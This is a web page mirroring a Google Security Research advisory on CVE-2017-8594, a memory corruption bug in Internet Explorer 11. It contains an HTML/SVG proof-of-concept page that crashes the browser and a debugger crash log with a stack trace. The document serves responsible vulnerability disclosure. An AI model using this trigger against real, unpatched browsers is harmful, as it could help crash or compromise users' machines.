首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Internet Explorer 11 CMarkup::DestroySplayTree Memory Corruption
来源:Google Security Research 作者:Fratric 发布时间:2017-07-19  
Microsoft IE: Memory curruption in CMarkup::DestroySplayTree 

CVE-2017-8594


There is a memory corruption issue in IE that can be triggered with svg <use> element.

The bug was confirmed on IE Version 11.0.9600.18617 (Update Version 11.0.40) running on Windows 7 64-bit. I was unable to reproduce it on Windows 10.

PoC:

==========================================

<!-- saved from url=(0014)about:internet -->
<script>
function go() {
setTimeout("window.location.reload()",100);
pattern.replaceChild(use,pattern.childNodes[0]);
}
</script>
<body onload=go()>
<!--this is a comment-->
<svg>
<use id="use" xlink:href="#fecomp">
<symbol>
<feComposite id="fecomp" />
</use>
<pattern id="pattern">
<foreignObject><body xmlns="<a href="http://www.w3.org/1999/xhtml" title="" class="" rel="nofollow">http://www.w3.org/1999/xhtml</a>"><output>2)lt</output>

==========================================

Following is the crash log when the PoC is ran on 64-bit IE in the single process mode (TabProcGrowth=0).

(1a38.2a98): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!CMarkup::DestroySplayTree+0x10a:
000007fe`e8de2723 48894110        mov     qword ptr [rcx+10h],rax ds:00000000`700400d6=????????????????
0:013> r
rax=0000000012a69010 rbx=0000000012a68c78 rcx=00000000700400c6
rdx=0000000000000001 rsi=0000000012a68f20 rdi=0000000012a58000
rip=000007fee8de2723 rsp=0000000012d9bfb0 rbp=0000000012d9c029
 <a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=0000000000000000  <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=0000000012a58000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=0000000012a20000
<a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=0000000000000025 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000012a68f20 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000012a68f20
<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=0000000012a20000 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000012a68bb0
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CMarkup::DestroySplayTree+0x10a:
000007fe`e8de2723 48894110        mov     qword ptr [rcx+10h],rax ds:00000000`700400d6=????????????????
0:013> k
 # Child-SP          RetAddr           Call Site
00 00000000`12d9bfb0 000007fe`e8de1ddc MSHTML!CMarkup::DestroySplayTree+0x10a
01 00000000`12d9c090 000007fe`e8ec9289 MSHTML!CMarkup::UnloadContents+0x49b
02 00000000`12d9c170 000007fe`e8ec9171 MSHTML!CMarkup::TearDownMarkupHelper+0xd5
03 00000000`12d9c1a0 000007fe`e90788b2 MSHTML!CMarkup::TearDownMarkup+0x75
04 00000000`12d9c1f0 000007fe`e998dc7a MSHTML!COmWindowProxy::SwitchMarkup+0x562
05 00000000`12d9c360 000007fe`e969ce9f MSHTML!COmWindowProxy::ExecRefresh+0xa3a
06 00000000`12d9c500 000007fe`e8d99d75 MSHTML!GlobalWndOnMethodCall+0x240
07 00000000`12d9c5a0 00000000`76dd9bbd MSHTML!GlobalWndProc+0x150
08 00000000`12d9c620 00000000`76dd98c2 USER32!UserCallWinProcCheckWow+0x1ad
09 00000000`12d9c6e0 000007fe`f2f83395 USER32!DispatchMessageWorker+0x3b5
0a 00000000`12d9c760 000007fe`f2f7df5b IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
0b 00000000`12d9f9e0 000007fe`fd09572f IEFRAME!LCIETab_ThreadProc+0x3a3
0c 00000000`12d9fb10 000007fe`f0b7925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f
0d 00000000`12d9fb40 00000000`76ed59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
0e 00000000`12d9fb90 00000000`7700a561 kernel32!BaseThreadInitThunk+0xd
0f 00000000`12d9fbc0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: ifratric


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hashicorp vagrant-vmware-fusio
·Microsoft Internet Explorer 11
·Easy File Sharing Web Server 7
·Microsoft Windows Kernel - 'IO
·Barracuda Load Balancer Firmwa
·Sonicwall < 8.1.0.6-21sv - 'ge
·Sophos Web Appliance 4.3.0.2 -
·Sonicwall < 8.1.0.2-14sv - 'si
·Windows Browser Example Exploi
·Netscaler SD-WAN 9.1.2.26.5612
·Metasploit Example Exploit
·Metasploit RPC Console Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved